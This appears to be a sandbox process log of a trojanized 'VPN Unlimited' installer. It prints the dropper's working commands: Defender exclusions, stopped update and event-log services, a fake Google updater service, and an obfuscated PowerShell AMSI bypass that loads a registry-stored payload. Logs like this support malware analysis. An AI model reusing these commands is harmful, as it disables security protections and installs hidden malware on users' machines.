"C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp" /SL5="$D006A,103859173,936960,C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe"
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
"C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe" -Duser.language=en -Duser.country=US -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 65001
C:\Windows\system32\reg.exe
C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 65001
C:\Windows\system32\reg.exe
C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mtQwSmGwLEWJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fsfIBvYcgaOAvy,[Parameter(Position=1)][Type]$ZYBMOcghmC)$vcdXabiKTOh=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+'l'+''+'e'+''+[Char](99)+''+'t'+'e'+'d'+''+[Char](68)+'e'+'l'+''+[Char](101)+''+'g'+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+',P'+[Char](117)+'bli'+'c'+''+[Char](44)+'Sea'+'l'+''+[Char](101)+'d,'+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+''+[Char](111)+'Clas'+[Char](115)+'',[MulticastDelegate]);$vcdXabiKTOh.DefineConstructor('R'+'T'+'S'+[Char](112)+'e'+'c'+''+[Char](105)+''+[Char](97)+''+'l'+'N'+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+'B'+''+[Char](121)+''+'S'+'ig'+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fsfIBvYcgaOAvy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+[Char](101)+'d');$vcdXabiKTOh.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+''+'y'+'S'+'i'+''+[Char](103)+',N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+'t'+''+[Char](44)+'V'+'i'+''+[Char](114)+'t
'+'u'+'a'+'l'+'',$ZYBMOcghmC,$fsfIBvYcgaOAvy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+'m'+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');Write-Output $vcdXabiKTOh.CreateType();}$bysCbyVaaHGQl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+'t'+'e'+'m'+'.d'+[Char](108)+'l')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+'o'+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+'32'+'.'+'U'+[Char](110)+'sa'+[Char](102)+''+[Char](101)+'N'+[Char](97)+'t'+[Char](105)+'v'+[Char](101)+'M'+'e'+''+'t'+''+'h'+'od'+'s'+'');$rcTDfBNaBDyzap=$bysCbyVaaHGQl.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+'Ad'+'d'+'r'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'t'+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$raEqzODfeTGmDTffnMm=mtQwSmGwLEWJ @([String])([IntPtr]);$hnYwppMPHReuIAcMBHSEGP=mtQwSmGwLEWJ 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$apkUFxnfScg=$bysCbyVaaHGQl.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+'Ha'+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'rn'+[Char](101)+''+'l'+'32'+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')));$QqtYndOsnDuHYm=$rcTDfBNaBDyzap.Invoke($Null,@([Object]$apkUFxnfScg,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+'Li'+[Char](98)+''+'r'+'ary'+[Char](65)+'')));$IadeBVEVDFlqepUqQ=$rcTDfBNaBDyzap.Invoke($Null,@([Object]$apkUFxnfScg,[Object](''+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+''+'a'+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+''+'t'+'')));$gjBVOhO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QqtYndOsnDuHYm,$raEqzODfeTGmDTffnMm).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+'d'+'l'+''+'l'+'');$kWTEgfGxsUcdchRSg=$rcTDfBNaBDyzap.Invoke($Null,@([Object]$gjBVOhO,[Object](''+'A'+''+'m'+''+'s'+''+[Char](105)+'S'+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+'f'+'f'+'e'+''+'r'+'')));$ZjbShkazuS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IadeBVEVDFlqepUqQ,$hnYwppMPHReuIAcMBHSEGP).Invoke($kWTEgfGxsUcdchRSg,[uint32]8,4,[ref]$ZjbShkazuS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kWTEgfGxsUcdchRSg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IadeBVEVDFlqepUqQ,$hnYwppMPHReuIAcMBHSEGP).Invoke($kWTEgfGxsUcdchRSg,[uint32]8,0x20,[ref]$ZjbShkazuS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+'T'+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'d'+''+'i'+''+'a'+''+[Char](108)+'e'+[Char](114)+'s'+[Char](116)+'a'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
dialer.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRm9yY2UgLUV4Y2x1c2lvblBhdGggIkM6XCI=')); Invoke-Expression $script}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Invoke-Expression $script}"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KSZCfUBdvTiQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KPyEjDOmvfQaoM,[Parameter(Position=1)][Type]$YtLWbYXVey)$CvDbKunIymc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+'d'+'D'+'el'+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+'m'+''+'o'+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+'l'+[Char](97)+''+'s'+''+[Char](115)+','+[Char](80)+''+'u'+''+'b'+''+'l'+'i'+'c'+''+[Char](44)+''+'S'+'e'+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'Cl'+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+'u'+'t'+''+[Char](111)+'C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$CvDbKunIymc.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+'me,'+[Char](72)+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$KPyEjDOmvfQaoM).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+'na'+[Char](103)+''+'e'+''+[Char](100)+'');$CvDbKunIymc.DefineMethod('I'+'n'+''+'v'+''+'o'+''+[Char](107)+''+'e'+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g,'+[Char](7
8)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'',$YtLWbYXVey,$KPyEjDOmvfQaoM).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+'Man'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $CvDbKunIymc.CreateType();}$kBRboUerECnnW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+'t.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+'n'+'s'+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+'e'+'M'+''+[Char](101)+''+[Char](116)+'ho'+[Char](100)+''+[Char](115)+'');$GGOhUJUTAVLAqf=$kBRboUerECnnW.GetMethod(''+[Char](71)+'etP'+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+'d'+'d'+'r'+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('Pub'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+'t'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GNMrKDkpUmfeiAUPKHV=KSZCfUBdvTiQ @([String])([IntPtr]);$ynKQXYtJrQdVJpLWDhGlvP=KSZCfUBdvTiQ 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZuRAyhUhvGV=$kBRboUerECnnW.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+'n'+[Char](101)+'l'+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+'l'+'l')));$iKjqgaOjJMphOi=$GGOhUJUTAVLAqf.Invoke($Null,@([Object]$ZuRAyhUhvGV,[Object]('Loa'+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$GHIyBMoysFkwRkMYk=$GGOhUJUTAVLAqf.Invoke($Null,@([Object]$ZuRAyhUhvGV,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+'alP'+[Char](114)+'o'+[Char](116)+'ec'+[Char](116)+'')));$ZePfiUK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iKjqgaOjJMphOi,$GNMrKDkpUmfeiAUPKHV).Invoke('a'+'m'+''+'s'+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$iQewOCddMYkynLFMd=$GGOhUJUTAVLAqf.Invoke($Null,@([Object]$ZePfiUK,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+'Sc'+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$BPWDLsLRaq=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GHIyBMoysFkwRkMYk,$ynKQXYtJrQdVJpLWDhGlvP).Invoke($iQewOCddMYkynLFMd,[uint32]8,4,[ref]$BPWDLsLRaq);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iQewOCddMYkynLFMd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GHIyBMoysFkwRkMYk,$ynKQXYtJrQdVJpLWDhGlvP).Invoke($iQewOCddMYkynLFMd,[uint32]8,0x20,[ref]$BPWDLsLRaq);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+'ale'+'r'+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "taskkill /IM WireVPNUImpl.exe /F"
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM WireVPNUImpl.exe /F
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "taskkill /IM vpn-unlimited.exe /F"
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vpn-unlimited.exe /F
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "taskkill /IM vpn-unlimited-launcher.exe /F"
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vpn-unlimited-launcher.exe /F
C:\Users\Admin\AppData\Local\Temp\4dab861c5f15add1529fa378ceef1272
C:\Users\Admin\AppData\Local\Temp\4dab861c5f15add1529fa378ceef1272
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "taskkill /IM vpn-unlimited-daemon.exe /F"
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vpn-unlimited-daemon.exe /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRm9yY2UgLUV4Y2x1c2lvblBhdGggIkM6XCI=')); Invoke-Expression $script}"
C:\Users\Admin\AppData\Local\Temp\is-GGC0A.tmp\VC_redist.x64.exe
"C:\Users\Admin\AppData\Local\Temp\is-GGC0A.tmp\VC_redist.x64.exe" /install /quiet /norestart
C:\Windows\Temp\{11C4A562-1DF9-45BB-84ED-B8E86757493D}\.cr\VC_redist.x64.exe
"C:\Windows\Temp\{11C4A562-1DF9-45BB-84ED-B8E86757493D}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\is-GGC0A.tmp\VC_redist.x64.exe" -burn.filehandle.attached=572 -burn.filehandle.self=548 /install /quiet /norestart
C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe
"C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{D33D7289-7B34-412F-BF37-11D305619EB5} {E09DFD33-2A60-46BA-879F-7FF1CEC34002} 2132
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{bf0b3ba3-b18f-4a55-98f6-da53ecb95817}
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={8bdfe669-9705-4184-9368-db9ce581e0e7} -burn.filehandle.self=908 -burn.embedded BurnPipe.{E211567A-3290-4003-80F1-31256CECB22E} {B102515E-A50C-4BD3-B09D-110C098369B3} 1624
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.filehandle.attached=544 -burn.filehandle.self=560 -uninstall -quiet -burn.related.upgrade -burn.ancestors={8bdfe669-9705-4184-9368-db9ce581e0e7} -burn.filehandle.self=908 -burn.embedded BurnPipe.{E211567A-3290-4003-80F1-31256CECB22E} {B102515E-A50C-4BD3-B09D-110C098369B3} 1624
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{8DA2BC5D-B172-4525-ACC1-EB02D1B9A740} {EEC559E1-FB07-4135-896C-2537E38DAEBE} 768
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-GGC0A.tmp\firewall_exception.bat" "C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe" "C:\Program Files (x86)\VPN Unlimited\openvpn.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe
"C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe" -install
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="VPN Unlimited"
C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe
"C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe" -start
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe
"C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe"
C:\Windows\SysWOW64\msiexec.exe
"msiexec.exe" /uninstall "C:\Users\Admin\AppData\Local\Temp\is-GGC0A.tmp\TunSetupVPNU.msi" /quiet
C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc.exe" create VPNUSplitTunnel type= kernel binPath= "C:\Program Files (x86)\VPN Unlimited\VpnuDriver\VpnuDriver.sys"
C:\Program Files (x86)\VPN Unlimited\vpnu-push.exe
"C:\Program Files (x86)\VPN Unlimited\vpnu-push.exe" --only-create-shortcut
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="OpenVPN"
C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe
"C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe" /r remove =net *Wintun
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe
"C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe" /r remove =net *WireGuard
C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe
"C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe" remove tap0901
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe
"C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe" install OemVista.inf tap0901
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="VPN Unlimited" dir=in action=allow program="C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe" enable=yes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
